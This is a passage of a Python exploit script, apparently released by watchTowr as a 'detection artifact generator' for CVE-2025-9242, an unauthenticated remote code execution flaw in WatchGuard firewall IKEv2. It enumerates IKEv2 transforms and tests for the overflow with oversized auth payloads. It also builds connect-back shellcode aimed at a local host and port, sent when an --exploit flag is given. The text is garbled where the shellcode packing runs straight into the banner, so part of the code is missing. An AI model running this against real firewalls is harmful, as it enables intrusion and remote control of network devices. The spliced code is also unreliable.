{'id': 7}, 'ENCR_3IDEA': {'id': 8}, 'ENCR_DES_IV32': {'id': 9}, 'RESERVED': {'id': 10}, 'ENCR_NULL': {'id': 11}, 'ENCR_AES_CBC': { 'id': 12, 'attributes': [ 0x800e0080, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 128 (0x0080) 0x800e00c0, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 192 (0x00c0) 0x800e0100, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 256 (0x0100) ], }, 'ENCR_AES_CTR': {'id': 13}, 'ENCR_AES_CCM_8': {'id': 14}, 'ENCR_AES_CCM_12': {'id': 15}, 'ENCR_AES_CCM_16': {'id': 16}, 'ENCR_AES_GCM_8': {'id': 18}, 'ENCR_AES_GCM_12': {'id': 19}, 'ENCR_AES_GCM_16': {'id': 20}, 'ENCR_NULL_AUTH_AES_GMAC': {'id': 21}, 'P1619_XTS_AES': {'id': 22}, 'ENCR_CAMELLIA_CBC': {'id': 23}, 'ENCR_CAMELLIA_CTR': {'id': 24}, 'ENCR_CAMELLIA_CCM_8': {'id': 25}, 'ENCR_CAMELLIA_CCM_12': {'id': 26}, 'ENCR_CAMELLIA_CCM_16': {'id': 27}, 'ENCR_CHACHA20_POLY1305': {'id': 28}, 'ENCR_AES_CCM_8_IIV': {'id': 29}, 'ENCR_AES_GCM_16_IIV': {'id': 30}, 'ENCR_CHACHA20_POLY1305_IIV': {'id': 31}, 'ENCR_KUZNYECHIK_MGM_KTREE': {'id': 32}, 'ENCR_MAGMA_MGM_KTREE': {'id': 33}, 'ENCR_KUZNYECHIK_MGM_MAC_KTREE': {'id': 34}, 'ENCR_MAGMA_MGM_MAC_KTREE': {'id': 35}, } pseudo_random_functions = { 'PRF_HMAC_MD5': 1, 'PRF_HMAC_SHA1': 2, 'PRF_HMAC_TIGER': 3, 'PRF_AES128_XCBC': 4, 'PRF_HMAC_SHA2_256': 5, 'PRF_HMAC_SHA2_384': 6, 'PRF_HMAC_SHA2_512': 7, 'PRF_AES128_CMAC': 8, 'PRF_HMAC_STREEBOG_512': 9, } integrity_algorithms = { 'AUTH_HMAC_MD5_96': 1, 'AUTH_HMAC_SHA1_96': 2, 'AUTH_DES_MAC': 3, 'AUTH_KPDK_MD5': 4, 'AUTH_AES_XCBC_96': 5, 'AUTH_HMAC_MD5_128': 6, 'AUTH_HMAC_SHA1_160': 7, 'AUTH_AES_CMAC_96': 8, 'AUTH_AES_128_GMAC': 9, 'AUTH_AES_192_GMAC': 10, 'AUTH_AES_256_GMAC': 11, 'AUTH_HMAC_SHA2_256_128': 12, 'AUTH_HMAC_SHA2_384_192': 13, 'AUTH_HMAC_SHA2_512_256': 14, } key_exchange_methods = { 'DH_GROUP_2048_BIT_MODP': 14, 'DH_GROUP_768_BIT_MODP': 1, 'DH_GROUP_1024_BIT_MODP': 2, 'DH_GROUP_1536_BIT_MODP': 5, 'DH_GROUP_3072_BIT_MODP': 15, 'DH_GROUP_4096_BIT_MODP': 16, 'DH_GROUP_6144_BIT_MODP': 17, 'DH_GROUP_8192_BIT_MODP': 18, 'RANDOM_ECP_GROUP_256_BIT': 19, 'RANDOM_ECP_GROUP_384_BIT': 20, 'RANDOM_ECP_GROUP_521_BIT': 21, 'DH_GROUP_1024_BIT_MODP_WITH_160_BIT_PRIME_ORDER_SUBGROUP': 22, 'DH_GROUP_2048_BIT_MODP_WITH_224_BIT_PRIME_ORDER_SUBGROUP': 23, 'DH_GROUP_2048_BIT_MODP_WITH_256_BIT_PRIME_ORDER_SUBGROUP': 24, 'RANDOM_ECP_GROUP_192_BIT': 25, 'RANDOM_ECP_GROUP_224_BIT': 26, 'BRAINPOOLP224R1': 27, 'BRAINPOOLP256R1': 28, 'BRAINPOOLP384R1': 29, 'BRAINPOOLP512R1': 30, 'CURVE25519': 31, 'CURVE448': 32, 'GOST3410_2012_256': 33, 'GOST3410_2012_512': 34, 'ML_KEM_512': 35, 'ML_KEM_768': 36, 'ML_KEM_1024': 37, } transforms = [] # Append encryptions for enc in encryptions: if 'attributes' in encryptions[enc] and encryptions[enc]['attributes'] is not None: for attr in encryptions[enc]['attributes']: transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, encryptions[enc]['id'], attr)) else: transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, encryptions[enc]['id'], None)) # Append pseudo-random functions for psr in pseudo_random_functions: transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, pseudo_random_functions[psr])) # Append integrity algorithms for integ in integrity_algorithms: transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, integrity_algorithms[integ])) # Loop each key exchange methods supported_transforms = [] service_found = False for kem in key_exchange_methods: # Retry on timeouts up to 2 times for i in range(2): ike.reset() try: logging.debug(f'[#] Sending IKEv2 SA Init with Diffie Hellman Group: {DiffieHellmanGroup(key_exchange_methods[kem]).name} ({key_exchange_methods[kem]})') r = ike.sa_init(transforms + [IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, key_exchange_methods[kem])]) sa = r.get(PayloadType.SECURITY_ASSOCIATION) if len(sa) != 1: service_found = True break # Append supported transform to list service_found = True supported_transform = IkeTransformGroup() for transform in sa[0].proposal.transforms: logging.debug(f'[#] Found supported transform: {str(transform)}') if transform.transform_type == TransformType.ENCRYPTION_ALGORITHM: supported_transform.encryption_algorithm = transform elif transform.transform_type == TransformType.PSEUDO_RANDOM_FUNCTION: supported_transform.pseudo_random_function = transform elif transform.transform_type == TransformType.INTEGRITY_ALGORITHM: supported_transform.integrity_algorithm = transform elif transform.transform_type == TransformType.DIFFIE_HELLMAN_GROUP: supported_transform.diffie_hellman_group = transform supported_transforms.append(supported_transform) break except IkeNoProposalChosenException: logging.debug(f'[#] No proposal chosen') service_found = True break except IkeInvalidKEPayloadException: logging.debug(f'[#] Invalid KE payload') service_found = True # Invalid KE payload occurs when the diffie hellman group is supported but the key exchange payload sent is invalid supported_transform = IkeTransformGroup() supported_transform.diffie_hellman_group = IkeTransform(TransformType.DIFFIE_HELLMAN_GROUP, 0, key_exchange_methods[kem], None) supported_transforms.append(supported_transform) break except TimeoutError: logging.debug(f'[#] Timeout') continue finally: ike.close() return service_found, supported_transforms @staticmethod def trigger(ike, payload): # Send SA Init up to 5 times success = False for i in range(5): ike.reset() try: logging.debug(f'[#] Trigger verification length ({len(payload)}) -> Sending SA Init') ike.sa_init() except TimeoutError: # Unexpected timeout, try again logging.debug(f'[#] Trigger verification length ({len(payload)}) -> Sending SA Init -> Timeout') ike.close() continue # SA Init succeeded as expected, send auth packet success = True break # SA Init failed multiple times if not success: logging.error('[-] SA Init failed multiple times, has the service crashed?') return RunnerStatus.SA_INIT_FAILED try: logging.debug(f'[#] Sending IKE_AUTH payload') ike.auth(payload) except TimeoutError: logging.debug(f'[#] Sending IKE_AUTH payload -> Timeout') return RunnerStatus.TIMEOUT finally: ike.close() logging.debug(f'[#] Sending IKE_AUTH payload -> Received response') return RunnerStatus.SUCCESS class Exploit: @staticmethod def build(version, ip, port): wg = WatchGuardFw(version) logging.info(f'[#] Building shellcode payload...') # sockaddr_in (sin_family: AF_INET [0x2], sin_port, sin_addr, sin_zero [0x0]) data = struct.pack(' \\ / | | \\/ \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| \\/ \\/ \\/ watchTowr-vs-WatchGuard-CVE-2025-9242.py (*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber) CVEs: [CVE-2025-9242] """ print(banner) # Setup logging logging.basicConfig(level=logging.DEBUG if args.verbose else logging.INFO, format='%(message)s') # Setup IKE client ike = Ike(args.rhost, args.rport, args.timeout) # Step 1: Check if IKEv2 transform ENCR_AES_CBC_256, PRF_HMAC_SHA2_256, AUTH_HMAC_SHA2_256_128, 2048 bit MODP group is supported default_status = Runner.check_default_transform(ike) if default_status != RunnerStatus.SUCCESS: # Skip enumerating transforms if requested if args.skip_enumerate: if default_status == RunnerStatus.NO_PROPOSAL_CHOSEN: logging.warning("[!] IKEv2 service found but default IKEv2 transform not supported") return logging.error("[-] No IKEv2 service found") return # Step 2: Enumerate IKEv2 Transforms logging.info('[#] Enumerating IKEv2 transforms...') service_found, supported_transforms = Runner.enumerate_transforms(ike) if not service_found: logging.error("[!] No IKEv2 service found") return if len(supported_transforms) == 0: logging.warning("[!] IKEv2 service found but no IKEv2 transforms supported") return # Print supported transforms logging.warning("[!] Default transform not supported") logging.info("[+] Supported IKEv2 transforms:\n") logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|') logging.info(f'| Encryption Algorithm | Pseudo Random Function | Integrity Algorithm | Diffie Hellman Group |') logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|') for transform in supported_transforms: logging.info(f'| {str(transform.encryption_algorithm).ljust(25)} | {str(transform.pseudo_random_function).ljust(25)} | {str(transform.integrity_algorithm).ljust(25)} | {str(transform.diffie_hellman_group).ljust(25)} |') logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|') return # Step 3: Trigger verification logging.info("[+] Default IKEv2 service found") if not args.soft_verify: logging.info(f'[#] Verifying if IKEv2 service is vulnerable...') # Send a valid auth packet to ensure the service is running as expected trigger_status = Runner.trigger(ike, b'A' * 512) if trigger_status == RunnerStatus.SA_INIT_FAILED: return elif trigger_status == RunnerStatus.TIMEOUT: logging.error("[-] IKEv2 timed out responding to valid auth packet, has the service crashed?") return # Send an invalid auth packet, if the service responds then it is vulnerable trigger_status = Runner.trigger(ike, b'A' * 513) if trigger_status == RunnerStatus.SA_INIT_FAILED: return elif trigger_status == RunnerStatus.TIMEOUT: logging.info("[-] IKEv2 service is patched against CVE-2025-9242") else: logging.info("[+] IKEv2 service is vulnerable to CVE-2025-9242") # Check the service is running as expected trigger_status = Runner.trigger(ike, b'A' * 512) if trigger_status == RunnerStatus.SA_INIT_FAILED: return elif trigger_status == RunnerStatus.TIMEOUT: logging.error("[-] IKEv2 timed out responding to valid auth packet, has the service crashed?") return # Step 4: Trigger exploit if not args.exploit: return if args.lhost is None: logging.error("[-] Local host parameter is required to exploit") return if FW_VERSION == None and args.fw_version is None: logging.error("[-] Failed to determine WatchGuard firmware version") return target_fw_version = args.fw_version if target_fw_version == None: target_fw_version = FW_VERSION if not WatchGuardFw.has(target_fw_version): logging.error(f"[-] Unsupported WatchGuard firmware version: {target_fw_version}") return payload = Exploit.build(target_fw_version, args.lhost, args.lport) logging.info(f'[#] Sending exploit payload to {args.lhost}:{args.lport}') Runner.trigger(ike, payload) if __name__ == "__main__": parser = argparse.ArgumentParser(description="WatchGuard CVE-2025-9242 Detection Artifact Generator") parser.add_argument("-rh", "--rhost", required=True, help="Remote host") parser.add_argument("-rp", "--rport", type=int, default=500, help="Remote port (default: 500)") parser.add_argument("-t", "--timeout", type=int, default=10, help="Timeout in seconds (default: 10)") parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output") parser.add_argument("-sv", "--soft-verify", action="store_true", help="Only verify based on version without verifying with auth packet") parser.add_argument("-se", "--skip-enumerate", action="store_true", help="Skip enumerating transforms") parser.add_argument("-e", "--exploit", action="store_true", help="Exploit the vulnerability") parser.add_argument("-lh", "--lhost", help="Local host") parser.add_argument("-lp", "--lport", type=int, default=31337, help="Local port (default: 31337)") parser.add_argument("-fw", "--fw-version", help="WatchGuard firmware version (eg: 12.11.3)") main(parser.parse_args())